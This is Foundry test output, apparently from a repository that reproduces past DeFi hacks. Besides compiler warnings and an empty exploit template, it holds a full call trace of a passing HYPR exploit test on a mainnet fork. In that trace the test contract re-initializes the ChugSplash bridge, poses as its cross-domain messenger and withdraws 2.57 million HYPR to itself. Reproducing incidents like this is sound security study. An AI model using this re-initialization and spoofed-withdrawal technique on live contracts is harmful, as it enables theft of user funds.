Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.38s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2023-12/HYPR_exp.sol:61:5:
   |
61 |     function xDomainMessageSender() external view returns (address) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 737.69ms (2.55ms CPU time)

Ran 1 test for src/test/2023-12/HYPR_exp.sol:ContractTest
[PASS] testExploit() (gas: 105749)
Logs:
  Exploiter HYPR balance before attack: 0.000000000000000000
  Exploiter HYPR balance after attack: 2570000.000000000000000000

Traces:
  [6544] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 18774584 [1.877e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(HYPR: [0x31aDdA225642a8f4D7e90d4152BE6661ab22a5a2], "HYPR")
    │   └─ ← [Return]
    ├─ [0] VM::label(ChugSplash: [0x40C31236B228935b0329eFF066B1AD96e319595e], "ChugSplash")
    │   └─ ← [Return]
    ├─ [0] VM::label(messageSender: [0x4200000000000000000000000000000000000010], "messageSender")
    │   └─ ← [Return]
    ├─ [0] VM::label(l2Token: [0xD7a421A6786cF4951a8FaE10385680222D63f89a], "l2Token")
    │   └─ ← [Return]
    └─ ← [Stop]

  [108549] ContractTest::testExploit()
    ├─ [9786] HYPR::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2626] 0x5877Bb958999eC60AdDaFa3e053F451A81dDBFE3::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ [924] HYPR::decimals() [staticcall]
    │   ├─ [267] 0x5877Bb958999eC60AdDaFa3e053F451A81dDBFE3::decimals() [delegatecall]
    │   │   └─ ← [Return] 18
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Exploiter HYPR balance before attack", val: 0, decimals: 18)
    ├─ [24585] ChugSplash::initialize(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [2347] 0xba86Cd28d937F1CC7C74a365368477408578364A::isUpgrading() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [11822] 0xE468B43b4Ae4D750Cd6a5D7EdACC1A751302c99C::initialize(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   ├─ emit Initialized(: 2)
    │   │   ├─  storage changes:
    │   │   │   @ 3: 0x000000000000000000000000f0e9a593d3b252511adfb5ea16ebf0a0450b2a11 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [55562] ChugSplash::finalizeERC20Withdrawal(HYPR: [0x31aDdA225642a8f4D7e90d4152BE6661ab22a5a2], l2Token: [0xD7a421A6786cF4951a8FaE10385680222D63f89a], ChugSplash: [0x40C31236B228935b0329eFF066B1AD96e319595e], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2570000000000000000000000 [2.57e24], 0x)
    │   ├─ [347] 0xba86Cd28d937F1CC7C74a365368477408578364A::isUpgrading() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [53781] 0xE468B43b4Ae4D750Cd6a5D7EdACC1A751302c99C::finalizeERC20Withdrawal(HYPR: [0x31aDdA225642a8f4D7e90d4152BE6661ab22a5a2], l2Token: [0xD7a421A6786cF4951a8FaE10385680222D63f89a], ChugSplash: [0x40C31236B228935b0329eFF066B1AD96e319595e], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2570000000000000000000000 [2.57e24], 0x) [delegatecall]
    │   │   ├─ [469] ContractTest::xDomainMessageSender() [staticcall]
    │   │   │   └─ ← [Return] messageSender: [0x4200000000000000000000000000000000000010]
    │   │   ├─ [853] HYPR::supportsInterface(0x01ffc9a7) [staticcall]
    │   │   │   ├─ [195] 0x5877Bb958999eC60AdDaFa3e053F451A81dDBFE3::supportsInterface(0x01ffc9a7) [delegatecall]
    │   │   │   │   └─ ← [Revert] EvmError: Revert
    │   │   │   └─ ← [Revert] EvmError: Revert
    │   │   ├─ [853] HYPR::supportsInterface(0x01ffc9a7) [staticcall]
    │   │   │   ├─ [195] 0x5877Bb958999eC60AdDaFa3e053F451A81dDBFE3::supportsInterface(0x01ffc9a7) [delegatecall]
    │   │   │   │   └─ ← [Revert] EvmError: Revert
    │   │   │   └─ ← [Revert] EvmError: Revert
    │   │   ├─ [35186] HYPR::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2570000000000000000000000 [2.57e24])
    │   │   │   ├─ [34523] 0x5877Bb958999eC60AdDaFa3e053F451A81dDBFE3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2570000000000000000000000 [2.57e24]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: ChugSplash: [0x40C31236B228935b0329eFF066B1AD96e319595e], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2570000000000000000000000 [2.57e24])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0 → 0x000000000000000000000000000000000000000000022037faaa846cf2400000
    │   │   │   │   │   @ 0x4928949d89e1b09a1d15df2eb33dd95d048e351bcf12fe798f83f4fb2b21793d: 0x000000000000000000000000000000000000000000022038a13314d8caf00000 → 0x000000000000000000000000000000000000000000000000a688906bd8b00000
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─  emit topic 0: 0x3ceee06c1e37648fcbb6ed52e17b3e1f275a1f8c7b22a84b2b84732431e046b3
    │   │   │        topic 1: 0x00000000000000000000000031adda225642a8f4d7e90d4152be6661ab22a5a2
    │   │   │        topic 2: 0x000000000000000000000000d7a421a6786cf4951a8fae10385680222d63f89a
    │   │   │        topic 3: 0x00000000000000000000000040c31236b228935b0329eff066b1ad96e319595e
    │   │   │           data: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000022037faaa846cf240000000000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─  emit topic 0: 0xd59c65b35445225835c83f50b6ede06a7be047d22e357073e250d9af537518cd
    │   │   │        topic 1: 0x00000000000000000000000031adda225642a8f4d7e90d4152be6661ab22a5a2
    │   │   │        topic 2: 0x000000000000000000000000d7a421a6786cf4951a8fae10385680222d63f89a
    │   │   │        topic 3: 0x00000000000000000000000040c31236b228935b0329eff066b1ad96e319595e
    │   │   │           data: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000022037faaa846cf240000000000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─  storage changes:
    │   │   │   @ 0xc0801673e11c2f40cd912c69b25fbd270c4e562e5d641d8ec0838a9729e12612: 0x000000000000000000000000000000000000000000022038a13314d8caf00000 → 0x000000000000000000000000000000000000000000000000a688906bd8b00000
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [1286] HYPR::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [626] 0x5877Bb958999eC60AdDaFa3e053F451A81dDBFE3::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 2570000000000000000000000 [2.57e24]
    │   └─ ← [Return] 2570000000000000000000000 [2.57e24]
    ├─ [924] HYPR::decimals() [staticcall]
    │   ├─ [267] 0x5877Bb958999eC60AdDaFa3e053F451A81dDBFE3::decimals() [delegatecall]
    │   │   └─ ← [Return] 18
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Exploiter HYPR balance after attack", val: 2570000000000000000000000 [2.57e24], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.51s (4.03s CPU time)

Ran 2 test suites in 6.59s (6.24s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
